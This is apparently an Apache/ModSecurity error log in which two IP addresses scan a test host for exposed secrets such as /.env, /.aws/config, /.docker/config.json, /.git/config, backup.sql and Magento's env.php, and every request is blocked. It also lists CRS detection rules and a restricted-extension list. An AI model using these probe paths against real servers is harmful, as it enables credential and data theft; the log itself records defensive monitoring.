[Wed Jan 14 12:05:18.490210 2026] [:error] [pid 1400439] [client 35.180.113.122:49522] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWd4bhZiJWN5ANZoWOd03gAAAAE"]
[Wed Jan 14 12:05:18.490400 2026] [:error] [pid 1400439] [client 35.180.113.122:49522] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWd4bhZiJWN5ANZoWOd03gAAAAE"]
[Wed Jan 14 12:05:18.569553 2026] [:error] [pid 1409076] [client 35.180.113.122:49560] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWd4bktembrIGtEDNjOE_AAAAAg"]
[Wed Jan 14 12:05:18.569880 2026] [:error] [pid 1409076] [client 35.180.113.122:49560] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWd4bktembrIGtEDNjOE_AAAAAg"]
[Wed Jan 14 12:05:18.570043 2026] [:error] [pid 1409076] [client 35.180.113.122:49560] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWd4bktembrIGtEDNjOE_AAAAAg"]
[Wed Jan 14 12:05:19.071083 2026] [authz_core:error] [pid 1400438] [client 35.180.113.122:49786] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Wed Jan 14 12:05:19.151711 2026] [authz_core:error] [pid 1401182] [client 35.180.113.122:49826] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Wed Jan 14 12:05:19.233392 2026] [authz_core:error] [pid 1400439] [client 35.180.113.122:49872] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Wed Jan 14 12:05:19.315774 2026] [:error] [pid 1409076] [client 35.180.113.122:49910] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWd4b0tembrIGtEDNjOE_QAAAAg"]
[Wed Jan 14 12:05:19.316115 2026] [:error] [pid 1409076] [client 35.180.113.122:49910] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWd4b0tembrIGtEDNjOE_QAAAAg"]
[Wed Jan 14 12:05:19.316276 2026] [:error] [pid 1409076] [client 35.180.113.122:49910] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWd4b0tembrIGtEDNjOE_QAAAAg"]
[Wed Jan 14 12:05:19.396767 2026] [authz_core:error] [pid 1400440] [client 35.180.113.122:49942] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Wed Jan 14 12:05:19.485301 2026] [authz_core:error] [pid 1400442] [client 35.180.113.122:49976] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Wed Jan 14 12:05:20.230068 2026] [:error] [pid 1400442] [client 35.180.113.122:50314] [client 35.180.113.122] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWd4cHdjbuaU9rmVGArPVQAAAAQ"]
[Wed Jan 14 12:05:20.230299 2026] [:error] [pid 1400442] [client 35.180.113.122:50314] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWd4cHdjbuaU9rmVGArPVQAAAAQ"]
[Wed Jan 14 12:05:20.230509 2026] [:error] [pid 1400442] [client 35.180.113.122:50314] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWd4cHdjbuaU9rmVGArPVQAAAAQ"]
[Wed Jan 14 12:05:20.642468 2026] [:error] [pid 1401182] [client 35.180.113.122:50500] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWd4cPL7maAL7YwXfyRGDQAAAAY"]
[Wed Jan 14 12:05:20.642813 2026] [:error] [pid 1401182] [client 35.180.113.122:50500] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWd4cPL7maAL7YwXfyRGDQAAAAY"]
[Wed Jan 14 12:05:20.642977 2026] [:error] [pid 1401182] [client 35.180.113.122:50500] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWd4cPL7maAL7YwXfyRGDQAAAAY"]
[Wed Jan 14 12:05:20.721431 2026] [:error] [pid 1400439] [client 35.180.113.122:50532] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWd4cBZiJWN5ANZoWOd04QAAAAE"]
[Wed Jan 14 12:05:20.721757 2026] [:error] [pid 1400439] [client 35.180.113.122:50532] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWd4cBZiJWN5ANZoWOd04QAAAAE"]
[Wed Jan 14 12:05:20.721917 2026] [:error] [pid 1400439] [client 35.180.113.122:50532] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWd4cBZiJWN5ANZoWOd04QAAAAE"]
[Wed Jan 14 12:05:21.136737 2026] [:error] [pid 1400463] [client 35.180.113.122:50758] [client 35.180.113.122] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWd4cRBlpHg03ETPJhlXJAAAAAU"]
[Wed Jan 14 12:05:21.136981 2026] [:error] [pid 1400463] [client 35.180.113.122:50758] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWd4cRBlpHg03ETPJhlXJAAAAAU"]
[Wed Jan 14 12:05:21.137191 2026] [:error] [pid 1400463] [client 35.180.113.122:50758] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWd4cRBlpHg03ETPJhlXJAAAAAU"]
[Wed Jan 14 12:05:22.048994 2026] [:error] [pid 1400438] [client 35.180.113.122:51128] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWd4ckBaCnzgGdZXs4_g8QAAAAA"]
[Wed Jan 14 12:05:22.049312 2026] [:error] [pid 1400438] [client 35.180.113.122:51128] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWd4ckBaCnzgGdZXs4_g8QAAAAA"]
[Wed Jan 14 12:05:22.049563 2026] [:error] [pid 1400438] [client 35.180.113.122:51128] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWd4ckBaCnzgGdZXs4_g8QAAAAA"]
[Wed Jan 14 17:34:50.152218 2026] [:error] [pid 1413485] [client 34.220.197.24:38206] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWfFqrz8c3lrfqFQknOrbQAAAAc"]
[Wed Jan 14 17:34:50.152500 2026] [:error] [pid 1413485] [client 34.220.197.24:38206] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWfFqrz8c3lrfqFQknOrbQAAAAc"]
[Wed Jan 14 17:34:50.152688 2026] [:error] [pid 1413485] [client 34.220.197.24:38206] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWfFqrz8c3lrfqFQknOrbQAAAAc"]
[Wed Jan 14 17:34:50.871758 2026] [:error] [pid 1413483] [client 34.220.197.24:38392] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWfFqkEv6TAVy2O49w-G2QAAAAU"]
[Wed Jan 14 17:34:50.871986 2026] [:error] [pid 1413483] [client 34.220.197.24:38392] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWfFqkEv6TAVy2O49w-G2QAAAAU"]
[Wed Jan 14 17:34:50.872148 2026] [:error] [pid 1413483] [client 34.220.197.24:38392] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWfFqkEv6TAVy2O49w-G2QAAAAU"]
[Wed Jan 14 17:34:52.327765 2026] [:error] [pid 1413459] [client 34.220.197.24:38754] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWfFrEmBk0CuCHAyPqetHQAAAAM"]
[Wed Jan 14 17:34:52.328109 2026] [:error] [pid 1413459] [client 34.220.197.24:38754] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWfFrEmBk0CuCHAyPqetHQAAAAM"]
[Wed Jan 14 17:34:52.328276 2026] [:error] [pid 1413459] [client 34.220.197.24:38754] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWfFrEmBk0CuCHAyPqetHQAAAAM"]
[Wed Jan 14 17:34:53.046699 2026] [:error] [pid 1413458] [client 34.220.197.24:38946] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWfFrcPNANEsYGk5QcxtEQAAAAI"]
[Wed Jan 14 17:34:53.047009 2026] [:error] [pid 1413458] [client 34.220.197.24:38946] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWfFrcPNANEsYGk5QcxtEQAAAAI"]
[Wed Jan 14 17:34:53.047168 2026] [:error] [pid 1413458] [client 34.220.197.24:38946] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWfFrcPNANEsYGk5QcxtEQAAAAI"]
